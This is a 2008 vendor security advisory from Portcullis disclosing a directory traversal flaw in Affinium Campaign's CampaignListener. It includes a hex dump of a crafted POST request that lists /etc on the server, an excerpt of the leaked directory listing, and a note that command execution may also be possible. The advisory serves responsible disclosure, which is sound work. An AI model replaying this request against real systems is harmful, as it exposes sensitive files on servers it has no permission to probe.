Portcullis Security Advisory - 08-006


Vulnerable System:

Affinium Campaign


Vulnerability Title:

The Listener is vulnerable to directory traversal.


Vulnerability Discovery And Development:

Portcullis Security Testing Services.


Credit For Discovery:

Tim Brown - Portcullis Computer-Security Ltd.


Affected systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.


Details:

It is possible for an attacker to traverse the directory structure and break out of the application imposed sandbox by manipulating requests from the web application's ActiveX control which encapsulates binary data within a HTTP POST request to https://webserver/Campaign/CampaignListener. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. For example:

00000000  50 4f 53 54 20 2f 43 61  6d 70 61 69 67 6e 2f 43  |POST /Campaign/C|
00000010  61 6d 70 61 69 67 6e 4c  69 73 74 65 6e 65 72 3f  |ampaignListener?|
00000020  43 6c 69 65 6e 74 49 44  3d 31 20 48 54 54 50 2f  |ClientID=1 HTTP/|
00000030  31 2e 31 0d 0a 48 6f 73  74 3a 20 77 65 62 73 65  |1.1..Host: webse|
00000040  72 76 65 72 0d 0a 43 6f  6f 6b 69 65 3a 20 55 6e  |rver..Cookie: Un|
00000050  69 63 61 44 65 66 61 75  6c 74 43 61 74 61 6c 6f  |icaDefaultCatalo|
00000060  67 3d 44 52 5f 54 65 73  74 2e 63 61 74 3b 20 43  |g=DR_Test.cat; C|
00000070  41 4d 50 41 49 47 4e 53  45 53 53 49 4f 4e 49 44  |AMPAIGNSESSIONID|
00000080  3d 48 41 5a 51 74 36 50  6c 6b 56 38 34 4c 62 32  |=HAZQt6PlkV84Lb2|
00000090  70 46 53 37 58 77 4d 6d  62 4c 41 31 76 4d 6e 74  |pFS7XwMmbLA1vMnt|
000000a0  6e 50 38 6d 4c 47 41 68  31 47 79 59 43 76 30 6e  |nP8mLGAh1GyYCv0n|
000000b0  44 37 79 6b 34 21 37 30  37 36 33 30 32 33 39 0d  |D7yk4!707630239.|
000000c0  0a 43 6f 6e 74 65 6e 74  2d 4c 65 6e 67 74 68 3a  |.Content-Length:|
000000d0  20 32 32 39 0d 0a 43 6f  6e 74 65 6e 74 2d 54 79  | 229..Content-Ty|
000000e0  70 65 3a 20 6d 75 6c 74  69 70 61 72 74 2f 66 6f  |pe: multipart/fo|
000000f0  72 6d 2d 64 61 74 61 0d  0a 0d 0a e1 00 00 00 01  |rm-data....á....|
00000100  00 02 07 08 00 00 00 01  01 00 00 00 12 00 00 00  |................|
00000110  0d 01 00 00 00 00 01 01  00 00 00 01 00 00 00 01  |................|
00000120  01 00 00 00 17 00 00 00  12 09 00 00 00 53 46 69  |.............SFi|
00000130  6c 65 53 79 73 00 01 01  00 00 00 01 00 00 00 04  |leSys...........|
00000140  97 00 00 00 00 00 00 00  42 00 00 00 00 00 46 00  |........B.....F.|
00000150  00 00 2f 65 74 63 00 00  00 00 00 00 00 00 00 00  |../etc..........|
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000190  00 00 00 00 00 00 00 00  00 3c 00 00 00 2f 61 70  |.........<.../ap|
000001a0  70 73 2f 75 6e 69 63 61  2f 61 66 66 69 6e 69 75  |ps/unica/affiniu|
000001b0  6d 2f 41 66 66 69 6e 69  75 6d 2f 43 61 6d 70 61  |m/Affinium/Campa|
000001c0  69 67 6e 2f 70 61 72 74  69 74 69 6f 6e 73 2f 70  |ign/partitions/p|
000001d0  61 72 74 69 74 69 6f 6e  31 00 42 00 00 00 00 00  |artition1.B.....|
000001e0  0d 0a                                             |..|

Results in the following being returned;

... snipped for brevity ...
00001200  00 00 01 00 00 00 41 41  06 00 00 00 70 61 73 73  |......AA....pass|
00001210  77 64 00 fb 66 60 c9 14  09 00 00 00 00 00 00 01  |wd.ûf`É.........|
00001220  00 00 00 41 41 04 00 00  00 70 69 6e 67 00 d7 8c  |...AA....ping.×.|
00001230  92 c5 82 7d 00 00 00 00  00 00 01 00 00 00 41 41  |.Å.}..........AA|
00001240  0c 00 00 00 70 6f 6c 69  63 79 64 2e 63 6f 6e 66  |....policyd.conf|
00001250  00 8a 46 3a c5 b0 08 00  00 00 00 00 00 01 00 00  |..F:Ű..........|
00001260  00 41 41 0d 00 00 00 70  72 65 73 65 72 76 65 2e  |.AA....preserve.|
00001270  6c 69 73 74 00 6f 47 3a  c5 c4 04 00 00 00 00 00  |list.oG:ÅÄ......|
00001280  00 01 00 00 00 41 41 07  00 00 00 70 72 6f 66 69  |.....AA....profi|
00001290  6c 65 00 45 c7 d8 c5 d8  0f 00 00 00 00 00 00 01  |le.EÇØÅØ........|
000012a0  00 00 00 41 41 0b 00 00  00 70 72 6f 66 69 6c 65  |...AA....profile|
000012b0  2e 61 77 73 00 6f 6c c4  c5 58 02 00 00 00 00 00  |.aws.olÄÅX......|
000012c0  00 01 00 00 00 41 41 0d  00 00 00 70 72 6f 66 69  |.....AA....profi|
000012d0  6c 65 2e 62 61 6b 75 70  00 0b 6f 44 c5 7f 09 00  |le.bakup..oDÅ...|
000012e0  00 00 00 00 00 01 00 00  00 41 41 0b 00 00 00 70  |.........AA....p|
000012f0  72 6f 66 69 6c 65 2e 75  6e 69 00 5a 71 c4 c5 be  |rofile.uni.ZqÄž|
00001300  01 00 00 00 00 00 00 01  00 00 00 41 41 09 00 00  |...........AA...|
00001310  00 70 72 6f 74 6f 63 6f  6c 73 00 8a 46 3a c5 ba  |.protocols..F:ź|
00001320  26 00 00 00 00 00 00 01  00 00 00 41 41 08 00 00  |&..........AA...|
00001330  00 70 73 65 2e 63 6f 6e  66 00 df 44 3a c5 fc 0c  |.pse.conf.ßD:Åü.|
00001340  00 00 00 00 00 00 01 00  00 00 41 41 0d 00 00 00  |..........AA....|
00001350  70 73 65 5f 74 75 6e 65  2e 63 6f 6e 66 00 df 44  |pse_tune.conf.ßD|
... snipped for brevity ...

Impact:

An attacker would be able to use this to list files in sensitive locations. Whilst it was not conclusively proven, it may also be possible to execute map existing files such as /etc/passwd to Affinumum Campaign tables and execute arbitrary commands by the further manipulation of requests from the ActiveX control to the CampaignListener web page.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches


Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.